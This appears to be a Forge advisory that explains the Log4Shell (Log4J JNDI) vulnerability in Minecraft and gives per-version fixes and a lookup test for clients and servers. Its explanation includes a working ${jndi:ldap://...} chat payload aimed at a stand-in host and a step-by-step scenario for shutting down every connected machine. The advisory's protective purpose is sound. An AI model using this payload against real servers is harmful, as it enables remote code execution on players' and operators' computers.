Log4J has a feature called Java Naming and Directory Interface (shortened to JNDI in this document), which allows a Java program to reach out to an external source to gather data.
If you put a section of text containing ${jndi:query}
into the log, the Log4J library will try to resolve the query.
This can be combined with the Lightweight Directory Access Protocol (LDAP) to connect to a remote server.
However, because JNDI is built for retrieving data, and JNDI is a Java program, if you put a JNDI query using LDAP into a log, it will connect to the given site, download a file, and then execute it.
This is called Remote Code Execution.
The problem is that Minecraft logs everything that happens in the world.
Every message, every death, every achievement.
Any of these can contain a JNDI query.
This might not seem so bad yet, but consider the following:
- You create a small Java program that executes
shutdown now
in a shell. - You host the Java class file on a small webserver.
- You join any Minecraft server
- You send the message ${jndi:ldap://your.ip.com/exploit/} into the chat of the server
- The server (and every client connected) logs the chat message.
- The logger downloads the class file.
- The class file is executed.
- The server's and every client's computer shut down, with no warning.
This exploit is called Log4Shell.
This is a brutal bug. It can be used for much more than just shutting down.
It can run crypto miners, it can install ransomware, it can just straight up format your main hard drive...
See technical details on the exploit here, Mojang's advice here (note that this doesn't apply to Forge, read on.).
See also, what you can do with the exploit if you want to have actual fun here.
Don't panic. This document exists to tell you how to protect yourself against it, as a user of Forge.
There's one thing we need to go over, first.
There's a clear and present split around the version of 1.12, regarding the Log4J library.
Versions before 1.12 use an older version of Log4J, and versions after use a newer version.
The newer version added a bunch of optional workarounds that we can use, but the older version has no such options.
I'm going to separate our advice into these two version ranges, but there's another special case and one last topic we'll have to talk about first.
If a server is protected from the bug, it will send the attack message to all connected clients with no hesitation.
It is therefore of the utmost importance that you ALWAYS, NO MATTER WHAT, protect your client.
You can find more detailed information on how to do that below.
To test whether or not these changes actually work for you, there's a simple trick.
Open a client.
To test the client:
- Join any world and send the message
${date:YYYY}
in chat. - Close the game and inspect the latest.log file. (it's in .minecraft/logs/)
- Scroll down to the last few messages sent. If you see the text
2021
being sent as a message by yourself, then your client is vulnerable and you should apply the fix listed for your version below.
To test the server:
- Join the server with your client
- Send the message
${date:YYYY}
in chat. - Inspect the server's latest.log file.
- If you see the text
2021
being sent as a message by yourself, then the server is vulnerable.
The expected behaviour is to either see the text ${date:YYYY}
in the log itself, or to not see it at all.
Some versions remove the message from the log, some versions just prevent it from resolving.
In either case, you must NOT see 2021 in the log file.
A second, related bug in Log4j was found after the initial patch.
Luckily, we are not affected by this, as it exploits a feature that Minecraft does not use.
The second Log4J bug is not something to worry about.
It is patched by the steps below.
1.11's client install has a quirk with the installation.
Forge overrides the vanilla logging configuration with its own.
However, as will be demonstrated later, the vanilla configuration is the one we want to use on the client.
So, to fix this:
- Close the launcher, if it is open.
- Find your .minecraft folder (On windows it's %AppData%/.minecraft, on linux it's ~/.minecraft/)
- Go to the versions folder
- Find the Forge installation you're using.
- The latest 1.11.2 Forge folder is called "1.11.2-forge1.11.2-13.20.1.2588"
- Open the folder
- Open .json file within, with any text editor.
- Find the section that looks like:
"logging": {
},
- Delete the whole logging block, including the last } and the comma.
Now you can restart the game and the fix will be applied to you.
Clients on versions between (and including) 1.7 and 1.11 are automatically protected by a fix that Mojang made.
You MUST restart the launcher for this fix to be applied, but after that point you should be fine.
Above 1.12, the newer library allowed us to make some more thorough changes.
Primarily, we've updated the logging library itself to a version that does not have the ability to connect to external servers at all.
To get this fix, simply go to the files site and download and run the installer for any of these versions:
- 1.18-38.0.17 or higher
- 1.17.1-37.1.1 or higher
- 1.16.5-36.2.20 or higher
- 1.15.2-31.2.56 or higher
- 1.14.4-28.2.25 or higher
- 1.13.2-25.0.222 or higher
- 1.12.2-14.23.5.2857 or higher
MAKE SURE that the launcher is using this new version and not the older, vulnerable version.
Apart from that, your client is now ready.
All server operators need to apply an adjusted logging configuration.
It's extremely simple:
- Download the logging xml file from here
- Put the file in the server folder (next to the .jar files)
- Restart the server
That's it. You don't need to do anything else. You're done.
Note that the command line argument -Dlog4j.configurationFile=log4j2_server.xml
exists, and can be used on vanilla servers.
Forge does not require this to be used.
Servers for these versions can benefit from the same fix.
Simply download the LATEST installer from the files site and install it in-place on top of your existing server.
Your existing run scripts should work with minor modifications.
Minecraft Version | Recommended Fix |
---|---|
1.7 | All server operators need to apply an adjusted logging configuration. It's extremely simple: - Download the logging xml file from here - Put the file in the server folder (next to the .jar files) - Add the command line argument -Dlog4j.configurationFile=log4j2_server.xml to the server startup script.- Restart the server That's it. You don't need to do anything else. |
1.8 to 1.11.2 | All server operators need to apply an adjusted logging configuration. It's extremely simple: - Download the logging xml file from here - Put the file in the server folder (next to the .jar files) - Restart the server That's it. You don't need to do anything else. You're done. Note that the command line argument -Dlog4j.configurationFile=log4j2_server.xml exists, and can be used on vanilla servers. Forge does not require this to be used for these versions. |
1.12 to 1.12.2 | A similar fix as for servers below 1.12 exists for this version. Simply download this file and put it in the server folder. Add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server). Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.Apart from that, your server is now ready to restart. |
1.13 to 1.16.3 | A similar fix as for servers below 1.12 exists for this version. Simply download this file and put it in the server folder. Add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server). Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.Apart from that, your server is now ready to restart. |
1.16.4 to the current version | A similar fix as for servers below 1.12 exists for this version. Simply download this file and put it in the server folder. For 1.17 and 1.18, simply put the text -Dlog4j.configurationFile=log4j2_server.xml in the user_jvm_args.txt file. For older versions, add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server). Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.Apart from that, your server is now ready to restart. |
@TheTinyNut yes..